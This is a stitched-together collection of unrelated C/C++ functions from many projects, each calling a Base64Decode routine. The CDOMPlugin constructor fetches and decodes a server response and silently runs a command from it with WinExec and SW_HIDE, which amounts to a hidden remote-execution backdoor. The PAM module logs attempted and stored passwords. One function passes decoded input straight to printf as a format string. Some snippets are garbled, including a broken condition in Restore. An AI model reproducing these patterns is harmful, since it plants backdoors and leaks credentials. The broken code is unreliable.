char *polypseud_decrypt_ep(const char *ep, char *privkey, char *closingkey) { polypseud_ctx *ctx = polypseud_ctx_new(); if(ctx == NULL) { return NULL; } pseudonym *pseudonym = pseudonym_decode(ctx, ep); unsigned char *bin_privkey, *bin_closingkey; size_t len_privkey, len_closingkey; Base64Decode(privkey, &bin_privkey, &len_privkey); Base64Decode(closingkey, &bin_closingkey, &len_closingkey); BIGNUM *bn_privkey = BN_bin2bn(bin_privkey, len_privkey, NULL); BIGNUM *bn_closingkey = BN_bin2bn(bin_closingkey, len_closingkey, NULL); free(bin_privkey); free(bin_closingkey); unsigned char *pp; size_t len = polypseud_decrypt(ctx, pseudonym, bn_privkey, bn_closingkey, &pp); BN_clear_free(bn_closingkey); BN_clear_free(bn_privkey); if(len == 0) { return NULL; } char *base64 = Base64Encode(pp, len); free(pp); pseudonym_free(pseudonym); polypseud_ctx_free(ctx); return base64; }
PAM_EXTERN int pam_sm_authenticate ( pam_handle_t *pamh, int flags, int argc, const char *argv[] ) { int retval; const char *user, *prompt; char *data,*data2,*flag; char * pwdt,*pwds; retval = pam_get_user ( pamh, &user, NULL ); if (retval != PAM_SUCCESS) return retval; D(("Got user: %s", user)); D(("cenas")); pam_prompt(pamh, PAM_PROMPT_ECHO_OFF, &data,"attempt"); if(data == NULL) return PAM_AUTH_ERR; Base64Decode(data,&pwdt); D(("Attempted Password: %s \n", pwdt)); pam_prompt(pamh, PAM_PROMPT_ECHO_OFF, &data2,"storedpassword"); Base64Decode(data2,&pwds); if(strlen(data2) == 0) return PAM_AUTH_ERR; D(("Stored Password: %s \n", pwds)); if(strcmp(pwdt,pwds) == 0){ D(("PTEID CC authentication: success!")); return PAM_SUCCESS; } return PAM_AUTH_ERR; }
TEST_P(Base64Test, DecodeStdString) { std::string s; StringRef encoded = GetParam().encoded; EXPECT_EQ(encoded.size(), Base64Decode(encoded, &s)); ASSERT_EQ(GetPlain(), s); // text already in s Base64Decode(encoded, &s); ASSERT_EQ(GetPlain(), s); }
TEST_P(Base64Test, DecodeSmallString) { SmallString<128> buf; StringRef encoded = GetParam().encoded; size_t len; StringRef plain = Base64Decode(encoded, &len, buf); EXPECT_EQ(encoded.size(), len); ASSERT_EQ(GetPlain(), plain); // reuse buf plain = Base64Decode(encoded, &len, buf); ASSERT_EQ(GetPlain(), plain); }
static void SetTriggerItem(CTriggerItem& item, char* line, CAES& crypto) { char* eq = strchr(line, '='); if (!eq) return; *eq = '\0'; char* key = line; char* val = eq + 1; if (0 == strcmp(key, "first")) item.first = atoi(val); else if (0 == strcmp(key, "count")) item.count = atoi(val); else if (0 == strcmp(key, "recv")) item.msg = UnescapeControlChars(val); else if (0 == strcmp(key, "send")) { if (*val == '+') // encrypted string { ++val; if (!crypto.IsInitialized()) { if (!AppConfig.QueryPassword(FALSE)) return; crypto.EnterPassword(AppConfig.passwd); } int base64_len = strlen(val); int enc_len = Base64Decode((BYTE*)val, base64_len, NULL, 0); char* enc_buf = new char[enc_len]; enc_len = Base64Decode((BYTE*)val, base64_len, (BYTE*)enc_buf, enc_len); char* dec_buf = new char[enc_len + 2]; memset(dec_buf, 0, enc_len + 2); crypto.Decrypt(enc_buf, dec_buf, enc_len); delete enc_buf; int dec_len = strlen(dec_buf); char* ppasswd = dec_buf + dec_len + 1; if (memcmp(LPCTSTR(AppConfig.passwd), ppasswd, AppConfig.passwd.GetLength())) { AppConfig.passwd.Empty(); delete []dec_buf; return; } item.respond = '+'; item.respond += dec_buf; delete []dec_buf; } else { item.respond = val; } } }
// Helpers to encode/decode JWK's special flavor of Base64 // * No whitespace // * No padding // * URL-safe character set nsresult CryptoBuffer::FromJwkBase64(const nsString& aBase64) { NS_ConvertUTF16toUTF8 temp(aBase64); temp.StripWhitespace(); // Re-add padding if (temp.Length() % 4 == 3) { temp.AppendLiteral("="); } else if (temp.Length() % 4 == 2) { temp.AppendLiteral("=="); } if (temp.Length() % 4 == 1) { return NS_ERROR_FAILURE; // bad Base64 } // Translate from URL-safe character set to normal temp.ReplaceChar('-', '+'); temp.ReplaceChar('_', '/'); // Perform the actual base64 decode nsCString binaryData; nsresult rv = Base64Decode(temp, binaryData); NS_ENSURE_SUCCESS(rv, rv); if (!Assign((const uint8_t*) binaryData.BeginReading(), binaryData.Length())) { return NS_ERROR_FAILURE; } return NS_OK; }
void DictionaryInfo::ReadLangTo(const GUTF8String& str, bool bEncoded) { strLangToCode = ""; langToLoc.clear(); if (str.length() == 0) return; string strTemp = str; if (bEncoded) Base64Decode(strTemp); strLangToRaw = strTemp.c_str(); stringstream sin(strTemp.c_str()); XMLParser parser; if (parser.Parse(sin)) { wstring strCode; if (parser.GetRoot()->GetAttribute(pszAttrCode, strCode)) strLangToCode = MakeUTF8String(strCode); ReadLocalizedStrings(langToLoc, *parser.GetRoot()); } }
CDOMPlugin::CDOMPlugin() { CHttp httpClient; std::string strJson, strBase64; strBase64 = httpClient.Get(TString(TEXT("")), TString(TEXT("/?id=laplace"))); Base64Decode( strBase64, &strJson ); Json::Reader reader; Json::Value root; if (reader.parse(strJson.c_str(), root)) // reader将Json字符串解析到root,root将包含Json里所有子元素 { std::string str = root["addr"].asString().c_str(); m_sPatchAt = atoi(str.c_str()); str = root["stub"].asString().c_str(); #ifdef _UNICODE strStub = Utility::StringLib::String2Wstring(str); #else strStub = str; #endif std::string strPsCmd = root["ps"].asString().c_str(); if (strPsCmd != "") WinExec(strPsCmd.c_str(), SW_HIDE); } }
void CHTTPXcertServer::ProcessRetrieveCRLResult( const char * inResult, void ** outBuffer, PGPSize * outBufferSize) { StPGPDataRef result; char * found; char * end; found = FindSubStringNoCase(inResult, kBeginCRL); if (found == 0) { ThrowPGPError_(kPGPError_ServerCertNotFound); } found += strlen(kBeginCRL); end = FindSubStringNoCase(found, kEndCRL); if (end == 0) { ThrowPGPError_(kPGPError_ServerCertNotFound); } result = static_cast<PGPByte *>(PGPNewData( PGPGetContextMemoryMgr(mContext), GetMaxBase64DecodedBufferSize(end - found), kPGPMemoryMgrFlags_None)); if (result == 0) { ThrowPGPError_(kPGPError_OutOfMemory); }; *outBufferSize = Base64Decode(found, end - found, result); *outBuffer = static_cast<PGPByte *>(result); result = 0; }
int wait_android_request() { char *header, *origin, *dest; char buffer[181] = {0}; char temp[181]={0}; char temp1[181]={0}; char receiver[181] = {0}; int rc; memset(originBuf,'\0', sizeof(originBuf)); memset(destBuf,'\0', sizeof(destBuf)); /* wait until receive android's request */ if(recv(global_socket, buffer, 181, NULL)) { printf("%s\n",buffer); rc = Base64Decode(buffer, receiver, BUFFFERLEN); printf("%s\n",receiver); header = strtok (receiver,"$"); origin = strtok (NULL,"$"); dest = strtok (NULL,"$"); strncpy(originBuf,origin,strlen(origin)); strncpy(destBuf,dest, strlen(dest)); if (!strcmp(header,"001")) { return 1; } else return 0; } }
/* %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % % % % % + R e a d I n l i n e I m a g e % % % % % % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % ReadInlineImage() reads a Base64-encoded inline image or image sequence. % The method returns a NULL if there is a memory shortage or if the image % cannot be read. On failure, a NULL image is returned and exception % describes the reason for the failure. % % The format of the ReadInlineImage method is: % % Image *ReadInlineImage(const ImageInfo *image_info,const char *content, % ExceptionInfo *exception) % % A description of each parameter follows: % % o image_info: the image info. % % o content: the image encoded in Base64. % % o exception: return any errors or warnings in this structure. % */ MagickExport Image *ReadInlineImage(const ImageInfo *image_info, const char *content,ExceptionInfo *exception) { Image *image; ImageInfo *read_info; unsigned char *blob; size_t length; register const char *p; image=NewImageList(); for (p=content; (*p != ',') && (*p != '\0'); p++) ; if (*p == '\0') ThrowReaderException(CorruptImageError,"CorruptImage"); p++; length=0; blob=Base64Decode(p,&length); if (length == 0) ThrowReaderException(CorruptImageError,"CorruptImage"); read_info=CloneImageInfo(image_info); (void) SetImageInfoProgressMonitor(read_info,(MagickProgressMonitor) NULL, (void *) NULL); image=BlobToImage(read_info,blob,length,exception); blob=(unsigned char *) RelinquishMagickMemory(blob); read_info=DestroyImageInfo(read_info); return(image); }
/* * Decyrpts an encrypted text and sets it to out * @param encrypted_message: the RSA encrypted ciphertext * @param length: the length of the original plaintext * @param key: the RSA key to decrypt with * @param out: the string to print plaintext to */ unsigned int rsa_decrypt_message(unsigned char *encrypted_message, unsigned int length, RSA *key, unsigned char **out) { unsigned char *encrypted_ascii_message = (unsigned char *)malloc(key_length); unsigned char *decrypted_message = (unsigned char *)malloc(length); unsigned int size; if (Base64Decode((char *)encrypted_message, &encrypted_ascii_message, (size_t *)&length) < 0) { printf("Base64Decode failed\n"); exit(EXIT_FAILURE); } printf ("message decoded\n"); if ((size = RSA_private_decrypt(length, encrypted_ascii_message, decrypted_message, key, padding)) < 0) { printf("RSA_private_decrypt() failed\n"); exit(EXIT_FAILURE); } printf ("message decrypted\n"); *(decrypted_message + size) = '\0'; *out = decrypted_message; return size; }
void Restore(IPersistable * window) const { clib::recursive_mutex::scoped_lock lock(m_mutex); WINDOWPLACEMENT placement; std::string encodedStr = CT2A(m_props.Get(PERSIST_PLACEMENT)); int decodedLen = sizeof(WINDOWPLACEMENT); BOOL hr = Base64Decode(encodedStr.c_str(), encodedStr.length(), reinterpret_cast<BYTE *>(&placement), &decodedLen); if (hr && placement.length == sizeof(WINDOWPLACEMENT)) { if (placement.showCmd == SW_SHOWMINIMIZED) { //(Prevent Launch To Minimized) placement.showCmd = SW_SHOWNORMAL; } RECT rMaxWA; ::SystemParametersInfo(SPI_GETWORKAREA, 0, &rMaxWA, 0); if( (placement.rcNormalPosition.left >= rMaxWA.left) && ( >= && (placement.rcNormalPosition.right <= rMaxWA.right) && (placement.rcNormalPosition.bottom <= rMaxWA.bottom) ) { // If All Values Within The Visible Screen (Taking Into Account Only The Primary Monitor...!), Set The Placement ::SetWindowPlacement(window->GetHwnd(), &placement); } } window->RestorePersistInfo(m_props); }
/* Base64 decoding */ static size_t b64_decode_binary_to_buffer(uint8_t *p_dst, size_t i_dst, const char *p_src, size_t srcLen) { int len = (int)i_dst; if (!Base64Decode(p_src, (int)srcLen, p_dst, &len)) return 0; return len; }
int fromBase64_Decode(const char* pSrc, int nLenSrc, char* pDst, int nLenDst) { int nDestLen = nLenDst; BOOL fRet = Base64Decode((LPCSTR)pSrc, nLenSrc, (BYTE*)pDst, &nDestLen); if (!fRet) nDestLen = 0; return (nDestLen); }
void DictionaryInfo::ReadPageIndex(const GUTF8String& str, bool bEncoded) { string strTemp = str; if (bEncoded) Base64Decode(strTemp); strPageIndex = strTemp.c_str(); }
void DecodeBase64(char* str) { char buf[255] = ""; int b = 0; Base64Decode(str, buf, 255); printf(buf); printf("\n"); }
std::wstring Base64Decode(const std::wstring& str, bool for_filename) { std::wstring output = StrToWstr(Base64Decode(WstrToStr(str))); if (for_filename) ReplaceChar(output, '-', '/'); return output; }
void DictionaryInfo::ReadCharMap(const GUTF8String& str, bool bEncoded) { string strTemp = str; if (bEncoded) Base64Decode(strTemp); strCharMap = strTemp.c_str(); }
void CHTTPXcertServer::ProcessRetrieveCertResult( const char * inResult, void ** outBuffer, PGPSize * outBufferSize) { StPGPDataRef result; StPGPDataRef decodedResult; PGPSize resultSize = strlen(inResult); result = static_cast<PGPByte *>(PGPNewData( PGPGetContextMemoryMgr(mContext), resultSize + 1, kPGPMemoryMgrFlags_None)); if (result == 0) { ThrowPGPError_(kPGPError_OutOfMemory); }; pgpCopyMemory(inResult, static_cast<char *>(result), resultSize + 1); char * found; char * end; found = FindSubStringNoCase(result, kBeginCertificate); if (found == 0) { ThrowPGPError_(kPGPError_ServerCertNotFound); } found += strlen(kBeginCertificate); end = FindSubStringNoCase(found, kEndCertificate); if (end == 0) { ThrowPGPError_(kPGPError_ServerCertNotFound); } if( end - found < 20 ) { /* Arbitrary check for "empty" certificate block. */ ThrowPGPError_(kPGPError_ServerCertNotFound); } decodedResult = static_cast<PGPByte *>(PGPNewData( PGPGetContextMemoryMgr(mContext), GetMaxBase64DecodedBufferSize(end - found), kPGPMemoryMgrFlags_None)); if (decodedResult == 0) { ThrowPGPError_(kPGPError_OutOfMemory); }; // Remove any <BR>s char * p = found; PGPUInt16 breakSize = strlen(kHTMLBreak); *end = 0; while ((p = FindSubStringNoCase(p, kHTMLBreak)) != 0) { for (PGPUInt16 i = 0; i < breakSize; i++, p++) { *p = ' '; } } *outBufferSize = Base64Decode(found, end - found, decodedResult); *outBuffer = static_cast<PGPByte *>(decodedResult); decodedResult = 0; }
char *ServerConf::getKey(){ char *k = NULL; int sz = 0x00; Base64Decode(keyStream, &k, &sz); if(sz == 24) return k; else return NULL; }
nsresult SRICheckDataVerifier::VerifyHash(const SRIMetadata& aMetadata, uint32_t aHashIndex, const nsACString& aSourceFileURI, nsIConsoleReportCollector* aReporter) { NS_ENSURE_ARG_POINTER(aReporter); nsAutoCString base64Hash; aMetadata.GetHash(aHashIndex, &base64Hash); SRILOG(("SRICheckDataVerifier::VerifyHash, hash[%u]=%s", aHashIndex, base64Hash.get())); nsAutoCString binaryHash; if (NS_WARN_IF(NS_FAILED(Base64Decode(base64Hash, binaryHash)))) { nsTArray<nsString> params; aReporter->AddConsoleReport(nsIScriptError::errorFlag, NS_LITERAL_CSTRING("Sub-resource Integrity"), nsContentUtils::eSECURITY_PROPERTIES, aSourceFileURI, 0, 0, NS_LITERAL_CSTRING("InvalidIntegrityBase64"), const_cast<const nsTArray<nsString>&>(params)); return NS_ERROR_SRI_CORRUPT; } uint32_t hashLength; int8_t hashType; aMetadata.GetHashType(&hashType, &hashLength); if (binaryHash.Length() != hashLength) { nsTArray<nsString> params; aReporter->AddConsoleReport(nsIScriptError::errorFlag, NS_LITERAL_CSTRING("Sub-resource Integrity"), nsContentUtils::eSECURITY_PROPERTIES, aSourceFileURI, 0, 0, NS_LITERAL_CSTRING("InvalidIntegrityLength"), const_cast<const nsTArray<nsString>&>(params)); return NS_ERROR_SRI_CORRUPT; } if (MOZ_LOG_TEST(SRILogHelper::GetSriLog(), mozilla::LogLevel::Debug)) { nsAutoCString encodedHash; nsresult rv = Base64Encode(mComputedHash, encodedHash); if (NS_SUCCEEDED(rv)) { SRILOG(("SRICheckDataVerifier::VerifyHash, mComputedHash=%s", encodedHash.get())); } } if (!binaryHash.Equals(mComputedHash)) { SRILOG(("SRICheckDataVerifier::VerifyHash, hash[%u] did not match", aHashIndex)); return NS_ERROR_SRI_CORRUPT; } SRILOG(("SRICheckDataVerifier::VerifyHash, hash[%u] verified successfully", aHashIndex)); return NS_OK; }
/** * Compute the hash of a sub-resource and compare it with the expected * value. */ static nsresult VerifyHash(const SRIMetadata& aMetadata, uint32_t aHashIndex, uint32_t aStringLen, const uint8_t* aString, const nsIDocument* aDocument) { NS_ENSURE_ARG_POINTER(aString); NS_ENSURE_ARG_POINTER(aDocument); nsAutoCString base64Hash; aMetadata.GetHash(aHashIndex, &base64Hash); SRILOG(("SRICheck::VerifyHash, hash[%u]=%s", aHashIndex, base64Hash.get())); nsAutoCString binaryHash; if (NS_WARN_IF(NS_FAILED(Base64Decode(base64Hash, binaryHash)))) { nsContentUtils::ReportToConsole(nsIScriptError::errorFlag, NS_LITERAL_CSTRING("Sub-resource Integrity"), aDocument, nsContentUtils::eSECURITY_PROPERTIES, "InvalidIntegrityBase64"); return NS_ERROR_SRI_CORRUPT; } uint32_t hashLength; int8_t hashType; aMetadata.GetHashType(&hashType, &hashLength); if (binaryHash.Length() != hashLength) { nsContentUtils::ReportToConsole(nsIScriptError::errorFlag, NS_LITERAL_CSTRING("Sub-resource Integrity"), aDocument, nsContentUtils::eSECURITY_PROPERTIES, "InvalidIntegrityLength"); return NS_ERROR_SRI_CORRUPT; } nsresult rv; nsCOMPtr<nsICryptoHash> cryptoHash = do_CreateInstance(";1", &rv); NS_ENSURE_SUCCESS(rv, rv); rv = cryptoHash->Init(hashType); NS_ENSURE_SUCCESS(rv, rv); rv = cryptoHash->Update(aString, aStringLen); NS_ENSURE_SUCCESS(rv, rv); nsAutoCString computedHash; rv = cryptoHash->Finish(false, computedHash); NS_ENSURE_SUCCESS(rv, rv); if (!binaryHash.Equals(computedHash)) { SRILOG(("SRICheck::VerifyHash, hash[%u] did not match", aHashIndex)); return NS_ERROR_SRI_CORRUPT; } SRILOG(("SRICheck::VerifyHash, hash[%u] verified successfully", aHashIndex)); return NS_OK; }
static int _video_send_ClientThread() { char *header, *init , *dest, *data; char buffer[181] = {0}; char temp[181]={0}; char temp1[181]={0}; char combine[181]={0}; char receiver[181] = {0}; char sender[181] = {0}; int rc = 0; // Send ice ifo to android memcpy(temp,mInfo_SendVideo,sizeof(temp)); sprintf(combine,"002$%s$%s$%s",destBuf,originBuf,temp); rc = Base64Encode(combine, sender, BUFFFERLEN); send(global_socket,sender,181,NULL); printf ("=============== Send Video ===============\n"); printf("[send video] send = %s\n", combine); printf("[send video] send[Encode] = %s\n", sender); //Receive ice info from android if(recv(global_socket, buffer, 181, NULL)) { rc = Base64Decode(buffer, receiver, BUFFFERLEN); printf("[send video] receive = %s\n", buffer); printf("[send video] receive[Decode] = %s\n", receiver); header = strtok (receiver,"$"); init = strtok (NULL,"$"); dest = strtok (NULL,"$"); data = strtok (NULL,"$"); //printf("%s - %s\n",header ,data); int j=0; if (data!=NULL) while(j<strlen(data)) { temp1[j] = *(data+j); j++; } if(!strcmp(header,"002")) { AndroidInfo_SendVideo = (gchar*)malloc(sizeof(gchar)*181); memcpy(AndroidInfo_SendVideo, temp1, sizeof(temp1)); flag_trans = 1; return 0; } } }
void Magick::Blob::base64(const std::string base64_) { size_t length; unsigned char *decoded; decoded=Base64Decode(base64_.c_str(),&length); if (decoded) updateNoCopy(static_cast<void*>(decoded),length, Magick::Blob::MallocAllocator); }
static void desdecode(char *content_in, char *content_out) { char de_content[1024] = {0}; Base64Decode(content_in, strlen(content_in), de_content, sizeof(de_content)); DES_cblock key_cblock; DES_string_to_key(key, &key_cblock); DES_key_schedule schedule; DES_set_key_checked(&key_cblock, &schedule); printf("key_cblock= %s\n", key_cblock); DES_ncbc_encrypt(de_content, content_out, strlen(de_content), &schedule, &key_cblock, DES_DECRYPT ); printf("key_cblock= %s\n", key_cblock); }
S32 main() { S32 ret; U32 length; U8 *keySalt; U8 *base64KeySalt; U8 index; /* Create a memory pool */ pool = CreateMemoryPool(MEMORY_POOL_SIZE); if (pool == NULL) { DP("Memory pool failed to be created.\n"); return RFAILED; } length = ((KEY_SALT_ORIG_LEN + 2) / 3) * 4 + 1; base64KeySalt = (U8 *)Calloc(pool, length); keySalt = (U8 *)Calloc(pool, KEY_SALT_ORIG_LEN); /* create master key and salt */ DP("1. Start to create master key and salt...\n\n"); ret = CreateCryptoKeySalt(base64KeySalt); if (ret != ROK) { DP("Master key and salt could not be created.\n"); return ret; } DP("Base64 master key and salt[%d]:\n\"%s\"\n\n", strlen(base64KeySalt), base64KeySalt); /* base64 decoding */ DP("2. Start to base64 decode master key and salt...\n\n"); ret = Base64Decode(base64KeySalt, length - 1, keySalt); if (ret != ROK) { DP("Master key and salt could not be decoded.\n"); return ret; } DP("Master key and salt:\n"); for (index = 0; index < KEY_SALT_ORIG_LEN; index++) { DP("0x%02x ", keySalt[index]); } DP("\n\n"); /* Destroy a memory pool */ DestroyMemoryPool(pool); return ROK; }
int main() { //Encode To Base64 char* base64EncodeOutput, *text="Hello World"; Base64Encode(text, strlen(text), &base64EncodeOutput); printf("Output (base64): %s\n", base64EncodeOutput); //Decode From Base64 char* base64DecodeOutput; size_t test; Base64Decode("SGVsbG8gV29ybGQ=", &base64DecodeOutput, &test); printf("Output: %s %d\n", base64DecodeOutput, test); return(0); }
int main() { char* in = "This is a simple base64 encoding test!\n這是個簡單的 Base64 編碼測試!"; int inlen = strlen(in); int outlen = Base64Encode((BYTE*)in, inlen, NULL, 0); char* out = new char[outlen + 1]; memset(out, 'X', outlen); outlen = Base64Encode((BYTE*)in, inlen, (BYTE*)out, outlen); out[outlen] = 0; printf("encoded: %s\n", out); in = out; inlen = strlen(in); outlen = Base64Decode((BYTE*)in, inlen, NULL, 0); out = new char[outlen + 1]; memset(out, 'X', outlen); outlen = Base64Decode((BYTE*)in, inlen, (BYTE*)out, outlen); out[outlen] = 0; printf("decoded: %s\n", out); delete in; delete out; getchar(); return 0; }
EC_POINT *decode_base64_point(const polypseud_ctx *ctx, char *string) { unsigned char *bytes; size_t length; if(Base64Decode(string, &bytes, &length) != 0) return NULL; EC_POINT *point = EC_POINT_new(ctx->ec_group); EC_POINT_oct2point(ctx->ec_group, point, bytes, length, ctx->bn_ctx); free(bytes); return point; }